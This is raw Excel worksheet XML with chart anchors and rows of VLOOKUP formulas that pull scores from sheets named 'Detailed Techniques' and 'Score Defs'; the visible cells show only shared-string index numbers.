    <xdr:graphicFrame macro="">
      <xdr:nvGraphicFramePr>
        <xdr:cNvPr id="10" name="Chart 9">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317500</xdr:colOff>
      <xdr:row>2</xdr:row>
      <xdr:rowOff>76200</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>18</xdr:col>
      <xdr:colOff>177800</xdr:colOff>
      <xdr:row>16</xdr:row>
      <xdr:rowOff>152400</xdr:rowOff>
    </xdr:to>
    <xdr:graphicFrame macro="">
      <xdr:nvGraphicFramePr>
        <xdr:cNvPr id="11" name="Chart 10">
          <a:extLst>
            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{00000000-0008-0000-06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xdr:colOff>
      <xdr:row>19</xdr:row>
      <xdr:rowOff>76200</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>10</xdr:col>
      <xdr:colOff>546100</xdr:colOff>
      <xdr:row>33</xdr:row>
      <xdr:rowOff>152400</xdr:rowOff>
    </xdr:to>
    <xdr:graphicFrame macro="">
      <xdr:nvGraphicFramePr>
        <xdr:cNvPr id="12" name="Chart 11">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298450</xdr:colOff>
      <xdr:row>19</xdr:row>
      <xdr:rowOff>101600</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>18</xdr:col>
      <xdr:colOff>158750</xdr:colOff>
      <xdr:row>33</xdr:row>
      <xdr:rowOff>177800</xdr:rowOff>
    </xdr:to>
    <xdr:graphicFrame macro="">
      <xdr:nvGraphicFramePr>
        <xdr:cNvPr id="13" name="Chart 12">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654050</xdr:colOff>
      <xdr:row>36</xdr:row>
      <xdr:rowOff>0</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>10</xdr:col>
      <xdr:colOff>514350</xdr:colOff>
      <xdr:row>50</xdr:row>
      <xdr:rowOff>76200</xdr:rowOff>
    </xdr:to>
    <xdr:graphicFrame macro="">
      <xdr:nvGraphicFramePr>
        <xdr:cNvPr id="14" name="Chart 13">
          <a:extLst>
            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{00000000-0008-0000-06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311150</xdr:colOff>
      <xdr:row>36</xdr:row>
      <xdr:rowOff>76200</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>18</xdr:col>
      <xdr:colOff>171450</xdr:colOff>
      <xdr:row>50</xdr:row>
      <xdr:rowOff>152400</xdr:rowOff>
    </xdr:to>
    <xdr:graphicFrame macro="">
      <xdr:nvGraphicFramePr>
        <xdr:cNvPr id="15" name="Chart 14">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2173110</xdr:colOff>
      <xdr:row>12</xdr:row>
      <xdr:rowOff>110066</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>20</xdr:col>
      <xdr:colOff>70555</xdr:colOff>
      <xdr:row>38</xdr:row>
      <xdr:rowOff>141111</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63"/>
  <sheetViews>
    <sheetView showGridLines="0" tabSelected="1" zoomScale="69" zoomScaleNormal="69" zoomScalePageLayoutView="82" workbookViewId="0">
      <pane ySplit="1" topLeftCell="A2" activePane="bottomLeft" state="frozen"/>
      <selection pane="bottomLeft" activeCell="C32" sqref="C32"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="8.86328125" defaultRowHeight="14.25" x14ac:dyDescent="0.45"/>
  <cols>
    <col min="1" max="1" width="32.265625" style="13" customWidth="1"/>
    <col min="2" max="2" width="1.86328125" style="13" hidden="1" customWidth="1"/>
    <col min="3" max="3" width="26.3984375" style="13" customWidth="1"/>
    <col min="4" max="4" width="1.86328125" style="13" hidden="1" customWidth="1"/>
    <col min="5" max="5" width="26.3984375" style="13" customWidth="1"/>
    <col min="6" max="6" width="1.86328125" style="13" hidden="1" customWidth="1"/>
    <col min="7" max="7" width="26.3984375" style="13" customWidth="1"/>
    <col min="8" max="8" width="1.86328125" style="13" hidden="1" customWidth="1"/>
    <col min="9" max="9" width="25.3984375" style="13" bestFit="1" customWidth="1"/>
    <col min="10" max="10" width="1.86328125" style="13" hidden="1" customWidth="1"/>
    <col min="11" max="11" width="26.3984375" style="13" customWidth="1"/>
    <col min="12" max="12" width="1.86328125" style="13" hidden="1" customWidth="1"/>
    <col min="13" max="13" width="26.3984375" style="13" customWidth="1"/>
    <col min="14" max="14" width="1.86328125" style="13" hidden="1" customWidth="1"/>
    <col min="15" max="15" width="26.3984375" style="13" customWidth="1"/>
    <col min="16" max="16" width="1.86328125" style="13" hidden="1" customWidth="1"/>
    <col min="17" max="17" width="25.86328125" style="13" bestFit="1" customWidth="1"/>
    <col min="18" max="18" width="1.86328125" style="13" hidden="1" customWidth="1"/>
    <col min="19" max="19" width="27" style="13" customWidth="1"/>
    <col min="20" max="20" width="1.86328125" style="1" hidden="1" customWidth="1"/>
    <col min="21" max="21" width="26" customWidth="1"/>
    <col min="22" max="22" width="2.3984375" hidden="1" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:24" s="2" customFormat="1" ht="15.75" x14ac:dyDescent="0.45">
      <c r="A1" s="6" t="s">
        <v>0</v>
      </c>
      <c r="B1" s="6"/>
      <c r="C1" s="6" t="s">
        <v>1</v>
      </c>
      <c r="D1" s="6"/>
      <c r="E1" s="6" t="s">
        <v>2</v>
      </c>
      <c r="F1" s="6"/>
      <c r="G1" s="6" t="s">
        <v>3</v>
      </c>
      <c r="H1" s="6"/>
      <c r="I1" s="6" t="s">
        <v>4</v>
      </c>
      <c r="J1" s="6"/>
      <c r="K1" s="6" t="s">
        <v>5</v>
      </c>
      <c r="L1" s="6"/>
      <c r="M1" s="6" t="s">
        <v>6</v>
      </c>
      <c r="N1" s="6"/>
      <c r="O1" s="6" t="s">
        <v>7</v>
      </c>
      <c r="P1" s="6"/>
      <c r="Q1" s="6" t="s">
        <v>8</v>
      </c>
      <c r="R1" s="6"/>
      <c r="S1" s="6" t="s">
        <v>9</v>
      </c>
      <c r="T1" s="6"/>
      <c r="U1" s="6" t="s">
        <v>10</v>
      </c>
      <c r="V1" s="6"/>
      <c r="W1" s="6"/>
      <c r="X1" s="6"/>
    </row>
    <row r="2" spans="1:24" x14ac:dyDescent="0.45">
      <c r="A2" s="12" t="s">
        <v>11</v>
      </c>
      <c r="B2" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(A2,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(A2,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="C2" s="12" t="s">
        <v>12</v>
      </c>
      <c r="D2" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(C2,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(C2,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="E2" s="12" t="s">
        <v>12</v>
      </c>
      <c r="F2" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(E2,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(E2,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="G2" s="12" t="s">
        <v>13</v>
      </c>
      <c r="H2" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(G2,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(G2,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="I2" s="12" t="s">
        <v>14</v>
      </c>
      <c r="J2" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(I2,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(I2,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="K2" s="12" t="s">
        <v>15</v>
      </c>
      <c r="L2" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(K2,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(K2,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="M2" s="12" t="s">
        <v>15</v>
      </c>
      <c r="N2" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(M2,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(M2,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="O2" s="12" t="s">
        <v>16</v>
      </c>
      <c r="P2" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(O2,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(O2,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="Q2" s="12" t="s">
        <v>17</v>
      </c>
      <c r="R2" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(Q2,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(Q2,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="S2" s="12" t="s">
        <v>18</v>
      </c>
      <c r="T2" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(S2,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(S2,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="U2" s="8" t="s">
        <v>19</v>
      </c>
      <c r="V2" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(U2,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(U2,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
    </row>
    <row r="3" spans="1:24" ht="28.5" x14ac:dyDescent="0.45">
      <c r="A3" s="12" t="s">
        <v>20</v>
      </c>
      <c r="B3" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(A3,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(A3,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="C3" s="12" t="s">
        <v>20</v>
      </c>
      <c r="D3" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(C3,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(C3,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="E3" s="12" t="s">
        <v>21</v>
      </c>
      <c r="F3" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(E3,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(E3,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="G3" s="12" t="s">
        <v>22</v>
      </c>
      <c r="H3" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(G3,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(G3,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="I3" s="12" t="s">
        <v>23</v>
      </c>
      <c r="J3" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(I3,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(I3,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="K3" s="12" t="s">
        <v>24</v>
      </c>
      <c r="L3" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(K3,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(K3,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="M3" s="12" t="s">
        <v>25</v>
      </c>
      <c r="N3" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(M3,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(M3,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="O3" s="12" t="s">
        <v>26</v>
      </c>
      <c r="P3" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(O3,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(O3,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="Q3" s="12" t="s">
        <v>27</v>
      </c>
      <c r="R3" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(Q3,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(Q3,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="S3" s="12" t="s">
        <v>28</v>
      </c>
      <c r="T3" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(S3,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(S3,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="U3" s="8" t="s">
        <v>29</v>
      </c>
      <c r="V3" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(U3,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(U3,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
    </row>
    <row r="4" spans="1:24" x14ac:dyDescent="0.45">
      <c r="A4" s="12" t="s">
        <v>30</v>
      </c>
      <c r="B4" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(A4,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(A4,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="C4" s="12" t="s">
        <v>30</v>
      </c>
      <c r="D4" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(C4,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(C4,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="E4" s="12" t="s">
        <v>31</v>
      </c>
      <c r="F4" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(E4,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(E4,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="G4" s="12" t="s">
        <v>32</v>
      </c>
      <c r="H4" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(G4,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(G4,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="I4" s="12" t="s">
        <v>33</v>
      </c>
      <c r="J4" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(I4,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(I4,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="K4" s="12" t="s">
        <v>34</v>
      </c>
      <c r="L4" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(K4,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(K4,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="M4" s="12" t="s">
        <v>35</v>
      </c>
      <c r="N4" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(M4,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(M4,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="O4" s="12" t="s">
        <v>36</v>
      </c>
      <c r="P4" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(O4,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(O4,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="Q4" s="12" t="s">
        <v>37</v>
      </c>
      <c r="R4" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(Q4,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(Q4,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="S4" s="12" t="s">
        <v>38</v>
      </c>
      <c r="T4" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(S4,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(S4,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="U4" s="8" t="s">
        <v>39</v>
      </c>
      <c r="V4" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(U4,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(U4,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
    </row>
    <row r="5" spans="1:24" ht="28.5" x14ac:dyDescent="0.45">
      <c r="A5" s="12" t="s">
        <v>25</v>
      </c>
      <c r="B5" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(A5,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(A5,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="C5" s="12" t="s">
        <v>25</v>
      </c>
      <c r="D5" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(C5,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(C5,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="E5" s="12" t="s">
        <v>40</v>
      </c>
      <c r="F5" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(E5,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(E5,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="G5" s="12" t="s">
        <v>41</v>
      </c>
      <c r="H5" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(G5,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(G5,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="I5" s="12" t="s">
        <v>42</v>
      </c>
      <c r="J5" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(I5,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(I5,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="K5" s="12" t="s">
        <v>43</v>
      </c>
      <c r="L5" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(K5,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(K5,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="M5" s="12" t="s">
        <v>44</v>
      </c>
      <c r="N5" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(M5,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(M5,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="O5" s="12" t="s">
        <v>45</v>
      </c>
      <c r="P5" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(O5,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(O5,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="Q5" s="12" t="s">
        <v>46</v>
      </c>
      <c r="R5" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(Q5,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(Q5,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="S5" s="12" t="s">
        <v>47</v>
      </c>
      <c r="T5" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(S5,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(S5,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="U5" s="8" t="s">
        <v>48</v>
      </c>
      <c r="V5" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(U5,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(U5,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
    </row>
    <row r="6" spans="1:24" ht="28.5" x14ac:dyDescent="0.45">
      <c r="A6" s="12" t="s">
        <v>49</v>
      </c>
      <c r="B6" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(A6,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(A6,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="C6" s="12" t="s">
        <v>31</v>
      </c>
      <c r="D6" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(C6,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(C6,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="E6" s="12" t="s">
        <v>50</v>
      </c>
      <c r="F6" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(E6,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(E6,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="G6" s="12" t="s">
        <v>51</v>
      </c>
      <c r="H6" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(G6,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(G6,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="I6" s="12" t="s">
        <v>52</v>
      </c>
      <c r="J6" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(I6,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(I6,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="K6" s="12" t="s">
        <v>53</v>
      </c>
      <c r="L6" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(K6,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(K6,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="M6" s="12" t="s">
        <v>54</v>
      </c>
      <c r="N6" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(M6,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(M6,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="O6" s="12" t="s">
        <v>55</v>
      </c>
      <c r="P6" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(O6,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(O6,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="Q6" s="12" t="s">
        <v>56</v>
      </c>
      <c r="R6" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(Q6,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(Q6,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="S6" s="12" t="s">
        <v>57</v>
      </c>
      <c r="T6" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(S6,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(S6,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="U6" s="8" t="s">
        <v>58</v>
      </c>
      <c r="V6" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(U6,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(U6,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
    </row>
    <row r="7" spans="1:24" ht="28.5" x14ac:dyDescent="0.45">
      <c r="A7" s="12" t="s">
        <v>59</v>
      </c>
      <c r="B7" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(A7,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(A7,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="C7" s="12" t="s">
        <v>60</v>
      </c>
      <c r="D7" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(C7,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(C7,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="E7" s="12" t="s">
        <v>61</v>
      </c>
      <c r="F7" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(E7,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(E7,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="G7" s="12" t="s">
        <v>62</v>
      </c>
      <c r="H7" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(G7,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(G7,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="I7" s="12" t="s">
        <v>63</v>
      </c>
      <c r="J7" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(I7,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(I7,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="K7" s="12" t="s">
        <v>64</v>
      </c>
